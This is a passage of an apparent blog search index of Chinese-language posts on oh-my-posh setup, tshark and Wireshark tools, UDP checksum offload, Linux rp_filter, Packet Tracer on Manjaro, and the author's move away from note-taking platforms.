pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/igur01/","summary":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上找到:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就会去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.","title":"powershell oh-my-posh 加载数据太慢"},{"content":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.1 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 在oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 
配置 oh-my-posh 在powershell中执行下面的命令,vscode会打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows terminal, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows terminal字体配置 用vscode打开对windows terminal的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows terminal\n3.3 vscode terminal 配置 在vscode中输入 Open Sett, 就可以打开设置的json文件。\n在配置中设置如下的内容\n\u0026#34;terminal.integrated.fontFamily\u0026#34;: \u0026#34;MesloLGM NF\u0026#34;, 4. 效果展示 4.1 windows terminal 4.2 vscode terminal 5. 体验 优点 oh-my-posh 总体还不错,能够方便的展示git相关的信息 缺点 性能拉跨,每次终端可能需要0.5s到2s之间的延迟卡顿,相比于linux上的shell要慢不少 6. 参考文献 https://ohmyposh.dev/docs/installation/prompt ","permalink":"https://wdd.js.org/posts/2022/07/ssgb9f/","summary":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.1 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 在oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode会打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows terminal, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 
字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial","title":"windows11 安装 oh my posh"},{"content":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我\n","permalink":"https://wdd.js.org/posts/2022/07/guv65u/","summary":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我","title":"关于我在闲鱼卖二手这件事"},{"content":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 
可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的blog地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人\n","permalink":"https://wdd.js.org/posts/2022/06/fk9rgk/","summary":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而那一见钟情必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的blog地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人","title":"最后一篇blog, 是时候说再见了"},{"content":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 
使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口\n3.2 按照表格输出 tshark -r demo.pcap -T tabs 3.3 按照指定的列输出 例如,抓的的sip的包,我们只想输出sip的user-agent字段。\ntshark -r demo.pcap -Tfields -e sip.User-Agent sip and sip.Method==REGISTER 按照上面的输出,我们可以用简单的sort和seq就可以把所有的设备类型打印出来。\n3.4 过滤之后写入文件 比如一个很大的pcap文件,我们可以用tshark过滤之后,写入一个新的文件。\n例如下面的,我们使用过滤器sip and sip.Method==REGISTER, 然后把过滤后的包写入到register.pcap\n● -Y \u0026ldquo;sip and frame.cap_len \u0026gt; 1300\u0026rdquo; 查看比较大的SIP包 tshark -r demo.pcap -w register.pcap sip and sip.Method==REGISTER\n3.4 统计分析 tshark支持统计分析,例如统计rtp 丢包率。\ntshark -r demo.pcap -qn -z rtp,streams -z参数是用来各种统计分析的,具体支持的统计类型,可以用\ntshark -z help ➜ Desktop tshark -z help afp,srt ancp,tree ansi_a,bsmap ansi_a,dtap ansi_map asap,stat bacapp_instanceid,tree bacapp_ip,tree bacapp_objectid,tree bacapp_service,tree calcappprotocol,stat camel,counter camel,srt collectd,tree componentstatusprotocol,stat conv,bluetooth conv,dccp conv,eth conv,fc 参考 https://www.wireshark.org/docs/man-pages/tshark.html ","permalink":"https://wdd.js.org/network/tshark/","summary":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 
使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口","title":"Tshark入门到精通"},{"content":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incorrect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 
我在接收方和发送方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接收方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/\n","permalink":"https://wdd.js.org/network/udp-checksum-offload/","summary":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incorrect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接收方和发送方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接收方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/","title":"Udp Checksum Offload"},{"content":"大多数时候我们都是图形界面的方式使用wireshark, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n4. 
randpktdump 这个似乎也是一个网络抓包的 Wireshark - randpktdump v0.1.0 Usage: randpktdump \u0026ndash;extcap-interfaces randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-dlts randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-config randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;type dns \u0026ndash;count 10 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n5. sshdump 这个应该是对ssh进行抓包的 Wireshark - sshdump v1.0.0 Usage: sshdump \u0026ndash;extcap-interfaces sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-dlts sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-config sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface eth2 \u0026ndash;remote-capture-command \u0026rsquo;tcpdump -U -i eth0 -w -\u0026rsquo; \u0026ndash;fifo=FILENAME \u0026ndash;capture\n6. idl2wrs 7. mergecap 合并多个抓包文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap\n8. mmdbresolve 9. randpkt 10. rawshark 11. reordercap Reordercap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Reorder timestamps of input file frames into output file. See https://www.wireshark.org for more information. Usage: reordercap [options] Options: -n don\u0026rsquo;t write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit.\n12. sharkd Usage: sharkd [\u0026lt;classic_options\u0026gt;|\u0026lt;gold_options\u0026gt;] Classic (classic_options): [-|] examples:\nunix:/tmp/sharkd.sock - listen on unix file /tmp/sharkd.sock Gold (gold_options): -a , \u0026ndash;api listen on this socket -h, \u0026ndash;help show this help information -v, \u0026ndash;version show version information -C , \u0026ndash;config-profile start with specified configuration profile Examples: sharkd -C myprofile sharkd -a tcp:127.0.0.1:4446 -C myprofile See the sharkd page of the Wireshark wiki for full details. 13. 
text2pcap Text2pcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Generate a capture file from an ASCII hexdump of packets. See https://www.wireshark.org for more information. Usage: text2pcap [options] where specifies input filename (use - for standard input) specifies output filename (use - for standard output)\n14. tshark 命令行版本的wireshark, 用的最多的 TShark (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Dump and analyze network traffic. See https://www.wireshark.org for more information.\n15. udpdump Wireshark - udpdump v0.1.0 Usage: udpdump \u0026ndash;extcap-interfaces udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-dlts udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-config udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;port 5555 \u0026ndash;fifo myfifo \u0026ndash;capture Options: \u0026ndash;extcap-interfaces: list the extcap Interfaces \u0026ndash;extcap-dlts: list the DLTs \u0026ndash;extcap-interface : specify the extcap interface \u0026ndash;extcap-config: list the additional configuration for an interface \u0026ndash;capture: run the capture \u0026ndash;extcap-capture-filter : the capture filter \u0026ndash;fifo : dump data to file or fifo \u0026ndash;extcap-version: print tool version \u0026ndash;debug: print additional messages \u0026ndash;debug-file: print debug messages to file \u0026ndash;help: print this help \u0026ndash;version: print the version \u0026ndash;port : the port to listens on. Default: 5555\n16. capinfos 打印出包的各种信息 Capinfos (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print various information (infos) about capture files. See https://www.wireshark.org for more information. Usage: capinfos [options] \u0026hellip; General infos: -t display the capture file type -E display the capture file encapsulation -I display the capture file interface information -F display additional capture file information -H display the SHA256, RIPEMD160, and SHA1 hashes of the file -k display the capture comment\n17. 
captype Captype (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print the file types of capture files.\n18. dftest ➜ ~ dftest \u0026ndash;help\nFilter: \u0026ndash;help\n19. dumpcap See https://www.wireshark.org for more information.\n","permalink":"https://wdd.js.org/network/wireshark-extra-cli/","summary":"大多数时候我们都是图形界面的方式使用wireshak, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. 
ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture","title":"Wireshark 附带的19个命令行程序"},{"content":"环境 kernel Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure对内存的影响 vfs_cache_pressure设置为200, 理论上系统倾向于回收内存\n","permalink":"https://wdd.js.org/posts/2022/06/eafeid/","summary":"环境 kernel Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure对内存的影响 vfs_cache_pressure设置为200, 理论上系统倾向于回收内存","title":"vfs_cache_pressure和min_free_kbytes对cache的影响"},{"content":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packettracer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中source对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packettracer打开后,必须登录账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 
","permalink":"https://wdd.js.org/posts/2022/06/manjaro-packettracer/","summary":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packettracer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中source对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packettracer打开后,必须登录账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","title":"manjaro 安装 packettracer"},{"content":"问题现象 主机上有两个网卡ens192和ens224。ens192网卡是对内网络的网卡,ens224是对外网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来将rp_filter设置为0后,语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail. By default failed packets are discarded. 2 - Loose mode as defined in RFC3704 Loose Reverse Path Each incoming packet\u0026#39;s source address is also tested against the FIB and if the source address is not reachable via any interface the packet check will fail. Current recommended practice in RFC3704 is to enable strict mode to prevent IP spoofing from DDos attacks. 
If using asymmetric routing or other complicated routing, then loose mode is recommended. The max value from conf/{all,interface}/rp_filter is used when doing source validation on the {interface}. Default value is 0. Note that some distributions enable it in startup scripts. 参考 https://www.jianshu.com/p/717e6cd9d2bb https://www.jianshu.com/p/16d5c130670b https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt ","permalink":"https://wdd.js.org/network/rp_filter/","summary":"问题现象 主机上有两个网卡ens192和ens224。ens192网卡是对内网络的网卡,ens224是对外网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来将rp_filter设置为0后,语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in 